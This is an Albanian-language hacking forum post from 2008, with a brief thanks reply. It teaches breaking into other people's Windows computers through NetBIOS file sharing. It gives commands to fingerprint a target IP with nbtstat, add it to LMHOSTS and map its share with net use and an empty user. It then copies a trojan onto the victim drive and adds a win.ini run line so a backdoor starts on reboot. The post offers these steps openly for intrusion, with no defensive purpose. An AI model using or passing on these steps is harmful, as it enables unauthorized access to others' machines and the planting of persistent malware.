www.Ks-team.co.nr
Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.Ks-team.co.nr


 
ForumForum  PortalliPortalli  Latest imagesLatest images  RegjistrohuRegjistrohu  identifikimi  Postimet e rejaPostimet e reja  

 

 Hackimi i PC's Tuaj

Shko poshtė 
2 posters
AutoriMesazh
n0rche
Administrator
Administrator
n0rche


Numri i postimeve : 183
Location : n'ShPiiiii
Registration date : 05/04/2008

Hackimi i PC's Tuaj Empty
MesazhTitulli: Hackimi i PC's Tuaj   Hackimi i PC's Tuaj EmptyThu Apr 10, 2008 5:21 pm

File and Printer sharing

Windowsi ka opcionin tė cilin pothuajse tė gjith e dijnė dhe quhet" file and print sharing". Shumica nga ju ndoshta nuk dijn si ta shfrytzojn nė raste se edhe ndokush e ka tė kyqur kėtė opcion. Juve qe nuk dini po ja mundėsoj mėsimin reth kėtij opcioni me vlerė. Kjo shtojcė shėrben pėr rjetat (psh. LAN e cila rjetė pėrdoret nė internet klube,shkolla, bredband e tj ), qė do tė thot se gjdo kush nė kėtė rjetė mund tė shef direktoriumin e caktuar, tė hyn nė te dhe tė i mer te gjitha qka i nevoiten nga ai direktorium apo tė pėrshkuaj tė gjitha nė printer. Kur e kyqni kėtė opcion nė kompjuterin e juaj hapet porti nr 139 i cili pranon dhe dergon protokole tė tipit "NetBIOS" gjė qė mund tė jet e dobishme nė LAN rjetat. Nuk duhet printer per gjdo kompjuter por perdoret vetem njė, skemi nevoj nė secilin kompjuter te montojm ! GB muzikė mjafton ta bejm kėte nė njerin nga to dhe fitojm mundesin e hyrjes nė atė folder. Por ne raste se ky kompjuter asht i kyqyr ne internet kėtu lind problemi se gjdo njeni qe e din IP adresen mund tė depertoj nė atė kompjuter. Tė kalojmė pra nė akcion:.
File Sharing Port ėshtė porti nr 139 quhet ndryshe edhe NetBIOS Session Service port. Kur e keni tė kyqur kėtė opcion atėherė pran kėtij porti hapen edhe dy tė tjera qė shfrytzojn UDP protokolin, dhe kėto janė porti nr 137 (Name Service) dhe 138 (Datagram Service) E tani ata qe kan pak njohuri ne DOS sulme, dijn qė pėr kėto porte esht bėrė njė numėr i madh i programeve tė ashtuquajtura nuckerėt tė cilat dėrgojn njė mori tė tė dhėnave te panevojshme nė kėto porte dhe shkatrojnė lidhjen e shfrytzuesit e tj. Ky text nuk do tė miret me ketė lloj tė sulmit por megjera mė tė dobishme. Nė kėtė text do tė ju mėsoj se si te depertoni nė njė kompjuter tė tillė. E tėra qė ju nevoitet gjendet ne windows . Nė njeren nga metodat mund te shfrytzohemi me shkrim nė tastaturė dhe pėr GUI per ata qe s'dijn qka do te thot GUI qe edhe spjegimi GUI = Graphical User Interface . Programet qe ju nevoiten janė Nbtstat.exe dhe Net.exe Mund tė i gjeni nėWindows direktorium. Kėto programe startohen nė MS-DOS Prompt Pėr ta par ndihmen pėr kėto programe nė DOS Prompt shkruani emrin e tyre dhe komanden /? (Net /? ose NbStat /?) Duhet ta dijme se ka kompjuter ne internet te cilat nuk e kan tė kyqur File and Printer shering opcionin por prapse prap kan portin 139 te hapur. Pra keta kan te startuar ndonjė Firewall ose NetBuster apo diqka te ngjajshme pėr mbrojtje.
Tani kur e keni te gadshėm NbtStat.exe-n e juaj mund ta shfrytzoni IP ose host-in e komjuterit ne tė cilin dėshironi tė depertoni-ta theni.
Pra po supozojme se keni host-in e kompjuterit me emrin psh: www bukuroshja ime.com ndersa IP adresa ėshtė 195.222.32.15 E para qė duhet ta beni ėshtė tė shiqoni a e ka ky kompjuter tė kyqur opcionin " file and printer sharing". Si? Nė MS DOS Prompt (auuuuuuu qka e due shum DOS-in) shkruani nbtstat -ndersa hostname nė shembullin tonė ėshtė: nbtstat -a www.bukuoshja ime.com por nė rastė se dėshironi ta pėrdorni IP adresen atėherė shkruani nbtstat -A IP nė rastin tonė: nbtstat -A 195.222.32.15
dallimi ėshtė nė germen (a) tė vogėl dhe tė madhe( A.) kėtu mund te i merni dy pėrgjegje tė ndryshme, njena ėshtė "Host Not Found". Nė rastese e merni kėte pėrgjegje mundeni meniher ta nderpreni tentimin e thyerjes se kėtij kompjuteri, sepse ai kompjuter nuk e ka te kyqur NetBIOS protokolin ose keni shkruar IP adresen e gabuar. Nė rastin tjeter e merni njė tabelė tė bukur me kolonat Name, Type dhe Status nė kėtė rast keni patur sukses) Nė rastėse e keni mar kėtė pergjegje tė dytė jeni nė gjysmen e rugės pėr ta thyer at kompjuter. Tabela duhet te duket kėshtu pėrafėrsisht:

Name Type Status
-----------------------------------------------------------------------------
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered

-----------------------------------------------------------------------------
Nė rastėse dėshironi ta shifni tabelen e juaj personaleatėherė shkruani nbtstat -n
Vlera brenda shenjave <> mund tė jetė
00 base computernames and workgroups, also in "*" queries
01 master browser, in magic __MSBROWSE__ cookie
03 messaging/alerter service; name of logged-in user
20 resource-sharing "server service" name
1B domain master-browser name
1C domain controller name
1E domain/workgroup master browser election announcement
Nuk e pėrktheva me qėllim se e humb domethanjen.
Pra nė rastese vlera ėshtė 20 (te ju them qė tė gjitha vlerat janė nė formėn hexadecimale) do tė thot qė ky folder lejon hyrjen. Pra si ta thejm dhe ta marim pėrmbajtjen e kėtij folderi apo drajverit- pa mar parasysh se qka ėshtė? Sė pari brenda Lmhosts filit duhet tė krijoni hyrjen e re. (Lmhosts filin mund ta gjeni nė folderin ku e ka vendin e kjo ėshtė C:\windows\Lmhosts natyrisht pa vazhdim) Poashtu egziston edhe shembulli i Lmhost filit qė gjendet nė c:\windows\Lmhosts.sam por ky shembull nuk ėshtė fil tė cilin duhet ju tė editoni(ka prapashtesėn sam, pra vetem filet qe skan atė prapashtesė) Nėraste se skeni Lmhost filin thjesht krijojeni. Lexoni edhe disa informata nga Lmhost.sam fili nė rastėse nuk e keni mund ta lexoni nga ky text:
--- Lmhosts.sam fili ---
# Copyright (c) 1993-1995 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows
# NT.
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the comptername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
#
\machine\system\currentcontrolset\services\lanmans erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the
include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.
---------Fundi i Lmhost.sam filit------------
Pėr tė krijuar hyrjen nė Lmhost filin thjesht hapeni at fil nė text editorin e juaj ( notepad, Wordpad word etj.) Shkruani IP numrin e kompjuterit klikoni nė pullen Tab shkruani Name (kjo ėshtė nga ajo informatė tė cilėn e morėt nė tabelė ,nė shembullin tonė ėshtė "Host") memoroni filin(ruani) dhe thjesht mbylleni. E tani i kemi mėnyrat e depėrtimit,mėnyrėn e lehtė dhe tė vėshtirė (cool mėnyra )) Kėshillė: Msoini tė dy mėnyrat.
---- (GUI) mėnyra- mėnyra e lehtė -----
N'rastėse nuk doni te mundoheni ma shum klikoni ne Start pastaj nė Find dhe zgjedheni Computer... Nė rastėse i keni futur te dhenat ne Lmhost si duhet ju paraqitet kompjuteri tė cilin dėshironi ta theni dhe thjesht filloni hulumtimin nė te nė tė njejtin mėnyrė siq hulumtoni nė kompjuterin e juaj
--- (cool) Mėnyra- mėnyra e vėshtirė--------
Pėr kėtė ju duhet dituri me punen e programit Net.exe Pėr ndihmė shkruani nė MS-DOS Prompt:
Net.exe /?
Ju kėdhilloj qė tėr filin e ndihmes ta memoroni nė ndonjė txt fil pėr ta mund ta lexoni mė lehtė kėte e bėni duke shkruar Net.exe /? >> C:\windows\desktop\net_ndihmė.txt Pra ky text placohet nė lokacionin C:\windows\desktop dhe emri i tij do tė jetė net_ndihmė.txt tani krijoni njė drajv virtual Pėr ta bėrė kėtė duhet tė shkruani:
net use drive \\[ipadresa]\[Name] /user:
Ku ėshtė drive te cilin dėshironi me pa/krijuar psh g: p: l: z: (unė personalisht pėrdori z
ip adresa ėshtė ip adresa e kompjuterit qe doni ta theni
Name ėshtė ajo informat nga Tabele qė fituat (nė rastin tonė ėshtė "Host")
Ju mbetet vetėm tė shkruani emrin e drajvit tė juaj tė ri dhe tė surfoni nė te si me pas qen i juaji , e permbajtja e saj do tė jetė pėrmbajtja e tėrė e kompjuterit tė thyer . (natyrisht shfrytzonie MS-DOS) Po thojm qė keni zgjedhur qe driveri i juaj te quhet Z: shkruani Z: dhe surfoni )

Qe njė shembull:
Po supozojmė qė keni njė trojan qe gjendet nė kompjuterin e juaj nė C:\ dhe quhet trojan.exe e tani dėshironi qė nė kompjuterin e huaj ta startoni kėtė trojan.
Keni kėtė situatė:
IP adresa: 195.222.37.42
Dhe emri folder (Name) ėshtė: Budalla
Startoni MS-DOS Prompt dhe shkruani:
net use z: \\195.222.37.42\Budalla "" /user: ""
Tani nevoitet ta kopjoni trojanin nė drajv z:
Shkruani copy C:\trojan.exe z:\trojan.exe
Mos gaboni me ba si me poshtė::
Ta ndroni drajv-in me komandom z: dhe tė shkruani trojan.exe sepse startoni trojanin nė kompjuterin e juaj .
Editoni win.ini filin dhe shtoni vijen
run=%SystemRoot%\backdoor.exe
Kjo ėshtė e tėra pas ristartimit tė kompjuterit trojani fillon tė lėviz.
Mbrapsht nė krye Shko poshtė
http://www.noori-shala.tk
daki10
Administrator
Administrator
daki10


Numri i postimeve : 127
Registration date : 29/03/2008

Hackimi i PC's Tuaj Empty
MesazhTitulli: Re: Hackimi i PC's Tuaj   Hackimi i PC's Tuaj EmptyThu Apr 10, 2008 5:57 pm

flm per kto broo!!!
Mbrapsht nė krye Shko poshtė
 
Hackimi i PC's Tuaj
Mbrapsht nė krye 
Faqja 1 e 1
 Similar topics
-
» Mu msu me formatizu PC tuaj
» Testojeni antivirusin tuaj
» Instalo vBulletin ne Hostin tuaj
» Si te qesim apo reklamojm google ne faqen tuaj
» 14 menyra qe ndikojn pozitivisht ne shendetin tuaj

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
www.Ks-team.co.nr :: Te ndryshme :: Tutorials-
Kėrce tek: